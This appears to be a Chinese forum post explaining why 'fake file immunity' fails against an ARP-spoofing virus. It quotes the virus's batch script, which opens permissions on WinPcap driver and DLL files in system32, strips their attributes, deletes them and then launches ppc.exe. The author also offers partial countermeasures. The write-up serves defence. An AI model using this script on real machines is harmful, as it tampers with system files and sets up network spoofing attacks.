| 以下为引用的内容: cacls %systemroot%\system32\drivers\npf.sys /e /p everyone:f ping 127.0.0.1 cacls %systemroot%\system32\npptools.dll /e /p everyone:f ping 127.0.0.1 cacls %systemroot%\system32\Packet.dll /e /p everyone:f ping 127.0.0.1 cacls %systemroot%\system32\WanPacket.dll /e /p everyone:f ping 127.0.0.1 cacls %systemroot%\system32\wpcap.dll /e /p everyone:f ping 127.0.0.1 attrib -r -h -s /s /d %systemroot%\system32\drivers\npf.sys ping 127.0.0.1 attrib -r -h -s /s /d %systemroot%\system32\npptools.dll ping 127.0.0.1 attrib -r -h -s /s /d %systemroot%\system32\Packet.dll ping 127.0.0.1 attrib -r -h -s /s /d %systemroot%\system32\WanPacket.dll ping 127.0.0.1 attrib -r -h -s /s /d %systemroot%\system32\wpcap.dll ping 127.0.0.1 rd %systemroot%\system32\drivers\npf.sys ping 127.0.0.1 rd %systemroot%\system32\npptools.dll ping 127.0.0.1 rd %systemroot%\system32\Packet.dll ping 127.0.0.1 rd %systemroot%\system32\WanPacket.dll ping 127.0.0.1 rd %systemroot%\system32\wpcap.dll ping 127.0.0.1 Del %systemroot%\system32\drivers\npf.sys ping 127.0.0.1 Del %systemroot%\system32\npptools.dll ping 127.0.0.1 Del %systemroot%\system32\Packet.dll ping 127.0.0.1 Del %systemroot%\system32\WanPacket.dll ping 127.0.0.1 Del %systemroot%\system32\wpcap.dll ping 127.0.0.1 ppc.exe Exit |
简单说一下,原因就是,病毒释放随机批处理,首先去掉NTFS权限,
进一步去掉文件属性
再进一步删掉空文件夹
最后删掉空文件
最后运行ARP欺骗的病毒.厉害吧,呵呵,所以假文件免疫的,不要再自欺欺人了.
更进一步,可以删掉cacls等外部命令,再禁止cmd,再更改bat文件关联.又可以防一时,如果病毒用程序达到以上目的,不需要批处理的话,那又没办法了.
